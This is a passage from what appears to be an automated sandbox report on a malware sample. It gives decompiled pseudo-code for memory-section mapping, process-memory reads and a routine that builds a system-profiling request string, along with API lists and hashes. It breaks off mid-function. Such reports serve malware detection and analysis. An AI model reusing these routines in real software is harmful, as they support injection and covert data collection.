				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E036D6D0A(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                          0x036d1915
                                                          0x036d191c
                                                          0x036d191d
                                                          0x036d191e
                                                          0x036d191f
                                                          0x036d1920
                                                          0x036d1931
                                                          0x036d1935
                                                          0x036d1949
                                                          0x036d194c
                                                          0x036d194f
                                                          0x036d1956
                                                          0x036d1959
                                                          0x036d1960
                                                          0x036d1963
                                                          0x036d1966
                                                          0x036d1969
                                                          0x036d196e
                                                          0x036d19a9
                                                          0x036d1970
                                                          0x036d1973
                                                          0x036d1979
                                                          0x036d197e
                                                          0x036d1982
                                                          0x036d19a0
                                                          0x036d1984
                                                          0x036d198b
                                                          0x036d1999
                                                          0x036d1999
                                                          0x036d1982
                                                          0x036d19b1

                                                          APIs
                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,036D459D), ref: 036D1969
                                                            • Part of subcall function 036D6D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,036D197E,00000002,00000000,?,?,00000000,?,?,036D197E,00000000), ref: 036D6D37
                                                          • memset.NTDLL ref: 036D198B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID:
                                                          • API String ID: 2533685722-0
                                                          • Opcode ID: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                                          • Instruction ID: d6097f7b3d0d768979899eea60dc9c407f0c4717e99d7677673394aed28c8859
                                                          • Opcode Fuzzy Hash: 39c6781f9f66cf2048ae46488313ef5fadf544eee56d406a9c41bd712d4d7bd0
                                                          • Instruction Fuzzy Hash: 24215EB5D00209AFDB00DFA9C8809EEFBF9FF48314F104429E606F7210D7709A098B64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D41FA Relevance: 3.0, APIs: 2, Instructions: 50memorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D41FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E036D61FC(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E036D2AE4(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E036D4822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x36da2d8, 0, _t25);
				}
				return _t22;
			}











                                                          0x036d41fa
                                                          0x036d420b
                                                          0x036d420f
                                                          0x036d426a
                                                          0x036d4211
                                                          0x036d4218
                                                          0x036d4220
                                                          0x036d4223
                                                          0x036d4228
                                                          0x036d422c
                                                          0x036d4232
                                                          0x036d423a
                                                          0x036d423d
                                                          0x036d4255
                                                          0x036d4255
                                                          0x036d4260
                                                          0x036d4260
                                                          0x036d4271

                                                          APIs
                                                            • Part of subcall function 036D61FC: lstrlen.KERNEL32(?,00000000,05969D70,00000000,036D39E8,05969F93,69B25F44,?,?,?,?,69B25F44,00000005,036DA00C,4D283A53,?), ref: 036D6203
                                                            • Part of subcall function 036D61FC: mbstowcs.NTDLL ref: 036D622C
                                                            • Part of subcall function 036D61FC: memset.NTDLL ref: 036D623E
                                                          • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,059693F4), ref: 036D4232
                                                          • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,76C85520,00000008,00000014,004F0053,059693F4), ref: 036D4260
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                          • String ID:
                                                          • API String ID: 1500278894-0
                                                          • Opcode ID: c53078b8d001e69932f966d5c9460af81f969f2f4cfc40ad5199714423edab5e
                                                          • Instruction ID: 489bdbd8c2af6771a9902719268d818c6ae138e70acc005fd889a2173b2a551b
                                                          • Opcode Fuzzy Hash: c53078b8d001e69932f966d5c9460af81f969f2f4cfc40ad5199714423edab5e
                                                          • Instruction Fuzzy Hash: A401B136A00209BADF22AF99EC44E9B7BB8FF84700F000029FA409A164DF71C824C754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628A806 Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0628A82F
                                                          • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,06286230,00000000,00000000,00000028,00000100), ref: 0628A851
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressMemory64ProcReadVirtualWow64
                                                          • String ID:
                                                          • API String ID: 752694512-0
                                                          • Opcode ID: caea723b33c2739d290db277cc1cfc95f27b4f6344dea19f3531b552170760aa
                                                          • Instruction ID: a6337e62902af62ef3a3c4d8aa448620b93e5c899760285acd62cbea72a8d15e
                                                          • Opcode Fuzzy Hash: caea723b33c2739d290db277cc1cfc95f27b4f6344dea19f3531b552170760aa
                                                          • Instruction Fuzzy Hash: 6FF0F976A10209BFCB129F99EC48C9EBBFAEBC9750714411AFA14D7220D6719552DF30
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D6D0A Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E036D6D0A(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                          0x036d6d1c
                                                          0x036d6d22
                                                          0x036d6d30
                                                          0x036d6d37
                                                          0x036d6d3c
                                                          0x036d6d42
                                                          0x00000000
                                                          0x036d6d43
                                                          0x00000000

                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,036D197E,00000002,00000000,?,?,00000000,?,?,036D197E,00000000), ref: 036D6D37
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction ID: 3aaa8ef4fe390441e141716ed24711e5db94287f088e90313aeeaec628a0479a
                                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                          • Instruction Fuzzy Hash: A8F01CB690020CBFEB11DFA5DC85CAFBBBDEB48294B104939F152E5094D670AE088A60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628BE80 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtMapViewOfSection.NTDLL(00000000,000000FF,0627717E,00000000,00000000,0627717E,?,00000002,00000000,?,0627C71A,00000000,0627717E,000000FF,?), ref: 0628BEAE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                          • Instruction ID: 59a99ea95609f1ba80842223f73ea737735f395e1f123aec9d5fa79b8f9f4c5e
                                                          • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                                                          • Instruction Fuzzy Hash: E1F012B690020CFFEB519FA5CC85CDFBBFDEB44245B008869F652E1050D2719E18DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062774AE Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0629A400), ref: 062774C5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: f47cb6ab51c46f4bd6e67c354e400a54e4086deb10f103ddcc508cad21e0c0a6
                                                          • Instruction ID: a9d53235c8d8ad9dc1918aed37b2f923a9efbd40d032d119d532faf3bfdb9206
                                                          • Opcode Fuzzy Hash: f47cb6ab51c46f4bd6e67c354e400a54e4086deb10f103ddcc508cad21e0c0a6
                                                          • Instruction Fuzzy Hash: 72F08231B201159FC760CE59EC88E9BBFB9FB467947144114EE04DB260D370E905DBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D56C8 Relevance: 39.2, APIs: 26, Instructions: 234memorystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 70%
                                                          			E036D56C8(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t43;
				int _t46;
				intOrPtr _t47;
				int _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t74;
				intOrPtr _t80;
				intOrPtr _t83;
				intOrPtr _t86;
				int _t89;
				intOrPtr _t90;
				int _t93;
				intOrPtr _t95;
				int _t98;
				intOrPtr _t100;
				int _t103;
				void* _t105;
				void* _t106;
				void* _t110;
				void* _t112;
				void* _t113;
				intOrPtr _t114;
				long _t116;
				intOrPtr* _t117;
				intOrPtr* _t118;
				long _t119;
				int _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t127;
				void* _t129;
				void* _t130;

				_t110 = __edx;
				_t106 = __ecx;
				_t127 =  &_v16;
				_t119 = __eax;
				_t32 =  *0x36da3e0; // 0x5969b78
				_v4 = _t32;
				_v8 = 8;
				_t33 = RtlAllocateHeap( *0x36da2d8, 0, 0x800); // executed
				_t105 = _t33;
				if(_t105 != 0) {
					if(_t119 == 0) {
						_t119 = GetTickCount();
					}
					_t35 =  *0x36da018; // 0x3df0b315
					asm("bswap eax");
					_t36 =  *0x36da014; // 0x3a87c8cd
					asm("bswap eax");
					_t37 =  *0x36da010; // 0xd8d2f808
					asm("bswap eax");
					_t38 =  *0x36da00c; // 0x81762942
					asm("bswap eax");
					_t39 =  *0x36da348; // 0x228d5a8
					_t3 = _t39 + 0x36db62b; // 0x74666f73
					_t120 = wsprintfA(_t105, _t3, 2, 0x3d175, _t38, _t37, _t36, _t35,  *0x36da02c,  *0x36da004, _t119);
					_t42 = E036D6927();
					_t43 =  *0x36da348; // 0x228d5a8
					_t4 = _t43 + 0x36db66b; // 0x74707526
					_t46 = wsprintfA(_t120 + _t105, _t4, _t42);
					_t129 = _t127 + 0x38;
					_t121 = _t120 + _t46;
					if(_a12 != 0) {
						_t100 =  *0x36da348; // 0x228d5a8
						_t8 = _t100 + 0x36db676; // 0x732526
						_t103 = wsprintfA(_t121 + _t105, _t8, _a12);
						_t129 = _t129 + 0xc;
						_t121 = _t121 + _t103;
					}
					_t47 =  *0x36da348; // 0x228d5a8
					_t10 = _t47 + 0x36db2de; // 0x74636126
					_t50 = wsprintfA(_t121 + _t105, _t10, 0);
					_t130 = _t129 + 0xc;
					_t122 = _t121 + _t50; // executed
					_t51 = E036D22D7(_t106); // executed
					_t112 = _t51;
					if(_t112 != 0) {
						_t95 =  *0x36da348; // 0x228d5a8
						_t12 = _t95 + 0x36db8d0; // 0x736e6426
						_t98 = wsprintfA(_t122 + _t105, _t12, _t112);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t98;
						HeapFree( *0x36da2d8, 0, _t112);
					}
					_t113 = E036D2A11();
					if(_t113 != 0) {
						_t90 =  *0x36da348; // 0x228d5a8
						_t14 = _t90 + 0x36db8d8; // 0x6f687726
						_t93 = wsprintfA(_t122 + _t105, _t14, _t113);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t93;
						HeapFree( *0x36da2d8, 0, _t113);
					}
					_t114 =  *0x36da3cc; // 0x59695b0
					_a20 = E036D2509(0x36da00a, _t114 + 4);
					_t55 =  *0x36da370; // 0x0
					_t116 = 0;
					if(_t55 != 0) {
						_t86 =  *0x36da348; // 0x228d5a8
						_t17 = _t86 + 0x36db8b2; // 0x3d736f26
						_t89 = wsprintfA(_t122 + _t105, _t17, _t55);
						_t130 = _t130 + 0xc;
						_t122 = _t122 + _t89;
					}
					_t56 =  *0x36da36c; // 0x0
					if(_t56 != _t116) {
						_t83 =  *0x36da348; // 0x228d5a8
						_t19 = _t83 + 0x36db889; // 0x3d706926
						wsprintfA(_t122 + _t105, _t19, _t56);
					}
					if(_a20 != _t116) {
						_t123 = RtlAllocateHeap( *0x36da2d8, _t116, 0x800);
						if(_t123 != _t116) {
							E036D1BE9(GetTickCount());
							_t62 =  *0x36da3cc; // 0x59695b0
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x36da3cc; // 0x59695b0
							__imp__(_t66 + 0x40);
							_t68 =  *0x36da3cc; // 0x59695b0
							_t69 = E036D1D33(1, _t110, _t105,  *_t68); // executed
							_t126 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t126 != _t116) {
								StrTrimA(_t126, 0x36d928c);
								_push(_t126);
								_t74 = E036D393C();
								_v20 = _t74;
								if(_t74 != _t116) {
									_t117 = __imp__;
									 *_t117(_t126, _v8);
									 *_t117(_t123, _v8);
									_t118 = __imp__;
									 *_t118(_t123, _v32);
									 *_t118(_t123, _t126);
									_t80 = E036D375F(0xffffffffffffffff, _t123, _v28, _v24); // executed
									_v56 = _t80;
									if(_t80 != 0 && _t80 != 0x10d2) {
										E036D561E();
									}
									HeapFree( *0x36da2d8, 0, _v48);
									_t116 = 0;
								}
								HeapFree( *0x36da2d8, _t116, _t126);
							}
							RtlFreeHeap( *0x36da2d8, _t116, _t123); // executed
						}
						HeapFree( *0x36da2d8, _t116, _a12);
					}
					RtlFreeHeap( *0x36da2d8, _t116, _t105); // executed
				}
				return _v16;
			}





























































                                                          0x036d56c8
                                                          0x036d56c8
                                                          0x036d56c8
                                                          0x036d56dd
                                                          0x036d56df
                                                          0x036d56e4
                                                          0x036d56e8
                                                          0x036d56f0
                                                          0x036d56f6
                                                          0x036d56fa
                                                          0x036d5702
                                                          0x036d570a
                                                          0x036d570a
                                                          0x036d570c
                                                          0x036d5718
                                                          0x036d5727
                                                          0x036d572c
                                                          0x036d572f
                                                          0x036d5734
                                                          0x036d5737
                                                          0x036d573c
                                                          0x036d573f
                                                          0x036d574b
                                                          0x036d5758
                                                          0x036d575a
                                                          0x036d5760
                                                          0x036d5765
                                                          0x036d5770
                                                          0x036d5772
                                                          0x036d5775
                                                          0x036d577b
                                                          0x036d577d
                                                          0x036d5786
                                                          0x036d5791
                                                          0x036d5793
                                                          0x036d5796
                                                          0x036d5796
                                                          0x036d5798
                                                          0x036d579d
                                                          0x036d57a9
                                                          0x036d57ab
                                                          0x036d57ae
                                                          0x036d57b0
                                                          0x036d57b5
                                                          0x036d57b9
                                                          0x036d57bb
                                                          0x036d57c0
                                                          0x036d57cc
                                                          0x036d57ce
                                                          0x036d57da
                                                          0x036d57dc
                                                          0x036d57dc
                                                          0x036d57e7
                                                          0x036d57eb
                                                          0x036d57ed
                                                          0x036d57f2
                                                          0x036d57fe
                                                          0x036d5800
                                                          0x036d580c
                                                          0x036d580e
                                                          0x036d580e
                                                          0x036d5814
                                                          0x036d5827
                                                          0x036d582b
                                                          0x036d5830
                                                          0x036d5834
                                                          0x036d5837
                                                          0x036d583c
                                                          0x036d5847
                                                          0x036d5849
                                                          0x036d584c
                                                          0x036d584c
                                                          0x036d584e
                                                          0x036d5855
                                                          0x036d5858
                                                          0x036d585d
                                                          0x036d5867
                                                          0x036d5869
                                                          0x036d5870
                                                          0x036d5888
                                                          0x036d588c
                                                          0x036d5898
                                                          0x036d589d
                                                          0x036d58a6
                                                          0x036d58b7
                                                          0x036d58bb
                                                          0x036d58c4
                                                          0x036d58ca
                                                          0x036d58d2
                                                          0x036d58d7
                                                          0x036d58e4
                                                          0x036d58ea
                                                          0x036d58f6
                                                          0x036d58fc
                                                          0x036d58fd
                                                          0x036d5902
                                                          0x036d5908
                                                          0x036d590e
                                                          0x036d5915
                                                          0x036d591c
                                                          0x036d5922
                                                          0x036d5929
                                                          0x036d592d
                                                          0x036d5938
                                                          0x036d593d
                                                          0x036d5943
                                                          0x036d594c
                                                          0x036d594c
                                                          0x036d595d
                                                          0x036d5963
                                                          0x036d5963
                                                          0x036d596d
                                                          0x036d596d
                                                          0x036d597b
                                                          0x036d597b
                                                          0x036d598c
                                                          0x036d598c
                                                          0x036d599a
                                                          0x036d599a
                                                          0x036d59ab

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 036D56F0
                                                          • GetTickCount.KERNEL32 ref: 036D5704
                                                          • wsprintfA.USER32 ref: 036D5753
                                                          • wsprintfA.USER32 ref: 036D5770
                                                          • wsprintfA.USER32 ref: 036D5791
                                                          • wsprintfA.USER32 ref: 036D57A9
                                                          • wsprintfA.USER32 ref: 036D57CC
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D57DC
                                                          • wsprintfA.USER32 ref: 036D57FE
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D580E
                                                          • wsprintfA.USER32 ref: 036D5847
                                                          • wsprintfA.USER32 ref: 036D5867
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 036D5882
                                                          • GetTickCount.KERNEL32 ref: 036D5892
                                                          • RtlEnterCriticalSection.NTDLL(05969570), ref: 036D58A6
                                                          • RtlLeaveCriticalSection.NTDLL(05969570), ref: 036D58C4
                                                          • StrTrimA.SHLWAPI(00000000,036D928C,00000000,059695B0), ref: 036D58F6
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 036D5915
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 036D591C
                                                          • lstrcat.KERNEL32(00000000,?), ref: 036D5929
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 036D592D
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 036D595D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 036D596D
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,00000000,059695B0), ref: 036D597B
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D598C
                                                          • RtlFreeHeap.NTDLL(00000000,00000000), ref: 036D599A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$wsprintf$Free$AllocateCountCriticalSectionTicklstrcatlstrcpy$EnterLeaveTrim
                                                          • String ID:
                                                          • API String ID: 2591679948-0
                                                          • Opcode ID: a8ac4eafa4b18a7eb6c334a1a885aff7a3a0bc22132c59079791e28f7e256c05
                                                          • Instruction ID: a72c230ee1115e542988a15579d1a0a0f529bd7e834eccb24f03cb4e73c8fb99
                                                          • Opcode Fuzzy Hash: a8ac4eafa4b18a7eb6c334a1a885aff7a3a0bc22132c59079791e28f7e256c05
                                                          • Instruction Fuzzy Hash: FC81E271C05204AFC711FBA9FC48E5B7BE9EB89304B0A1518F909D721CD732D925DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062734FF Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 143 62734ff-6273510 144 6273564-627356f 143->144 145 6273512-627351e call 6271268 call 628e869 143->145 147 6273576-6273588 call 6282650 144->147 148 6273571 call 6279e82 144->148 159 6273524-6273531 SleepEx 145->159 154 627358a-6273597 ReleaseMutex FindCloseChangeNotification 147->154 155 6273599-62735a0 147->155 148->147 154->155 157 62735a2-62735af ResetEvent CloseHandle 155->157 158 62735b1-62735be SleepEx 155->158 157->158 158->158 160 62735c0 158->160 159->159 161 6273533-627353a 159->161 162 62735c5-62735d2 SleepEx 160->162 163 6273550-6273562 RtlDeleteCriticalSection * 2 161->163 164 627353c-6273542 161->164 165 62735d4-62735d9 162->165 166 62735db-62735e2 162->166 163->144 164->163 167 6273544-627354b call 628e803 164->167 165->162 165->166 168 62735e4-62735ed HeapFree 166->168 169 62735f3-62735fa 166->169 167->163 168->169 171 6273602-6273608 169->171 172 62735fc-62735fd call 62883fa 169->172 174 627360a-6273611 171->174 175 6273619-6273620 171->175 172->171 174->175 178 6273613-6273615 174->178 176 6273622-6273623 RtlRemoveVectoredExceptionHandler 175->176 177 6273629-627362f 175->177 176->177 179 6273636 177->179 180 6273631 call 6279131 177->180 178->175 182 627363b-6273648 SleepEx 179->182 180->179 183 6273651-627365a 182->183 184 627364a-627364f 182->184 185 6273672-6273682 LocalFree 183->185 186 627365c-6273661 183->186 184->182 184->183 186->185 187 6273663 186->187 188 6273666-6273670 FindCloseChangeNotification 187->188 188->185 188->188
                                                          APIs
                                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0628E846), ref: 06273528
                                                          • RtlDeleteCriticalSection.NTDLL(0629A3E0), ref: 0627355B
                                                          • RtlDeleteCriticalSection.NTDLL(0629A400), ref: 06273562
                                                          • ReleaseMutex.KERNEL32(000005C0,00000000,?,?,?,0628E846), ref: 0627358B
                                                          • FindCloseChangeNotification.KERNEL32(?,?,0628E846), ref: 06273597
                                                          • ResetEvent.KERNEL32(00000000,00000000,?,?,?,0628E846), ref: 062735A3
                                                          • CloseHandle.KERNEL32(?,?,0628E846), ref: 062735AF
                                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0628E846), ref: 062735B5
                                                          • SleepEx.KERNEL32(00000064,00000001,?,?,0628E846), ref: 062735C9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0628E846), ref: 062735ED
                                                          • RtlRemoveVectoredExceptionHandler.NTDLL(061605B8), ref: 06273623
                                                          • SleepEx.KERNEL32(00000064,00000001,?,?,0628E846), ref: 0627363F
                                                          • FindCloseChangeNotification.KERNEL32(0689F2C8,?,?,0628E846), ref: 06273668
                                                          • LocalFree.KERNEL32(?,?,0628E846), ref: 06273678
                                                            • Part of subcall function 06271268: GetVersion.KERNEL32(?,?,76CDF720,?,06273517,00000000,?,?,?,0628E846), ref: 0627128C
                                                            • Part of subcall function 06271268: GetModuleHandleA.KERNEL32(?,068997B5,?,76CDF720,?,06273517,00000000,?,?,?,0628E846), ref: 062712A9
                                                            • Part of subcall function 06271268: GetProcAddress.KERNEL32(00000000), ref: 062712B0
                                                            • Part of subcall function 0628E869: RtlEnterCriticalSection.NTDLL(0629A400), ref: 0628E873
                                                            • Part of subcall function 0628E869: RtlLeaveCriticalSection.NTDLL(0629A400), ref: 0628E8AF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                                          • String ID:
                                                          • API String ID: 1259384122-0
                                                          • Opcode ID: 5b465d91640e1c361e77fefd1f9068b0efe52dc452e03e55d697f00102c0ffd3
                                                          • Instruction ID: c1ca888d126080d74e59190316de0c93ccd0294680afedae01344b8b14ddec3a
                                                          • Opcode Fuzzy Hash: 5b465d91640e1c361e77fefd1f9068b0efe52dc452e03e55d697f00102c0ffd3
                                                          • Instruction Fuzzy Hash: 9E414C71B21313ABDBA0EF69FD8CE1977AAAB86744B450025EF00D7290DB71D940DEB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D7AF1 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 92%
                                                          			E036D7AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E036D6D63(__eax + __eax + 1);
				if(_t56 != 0) {
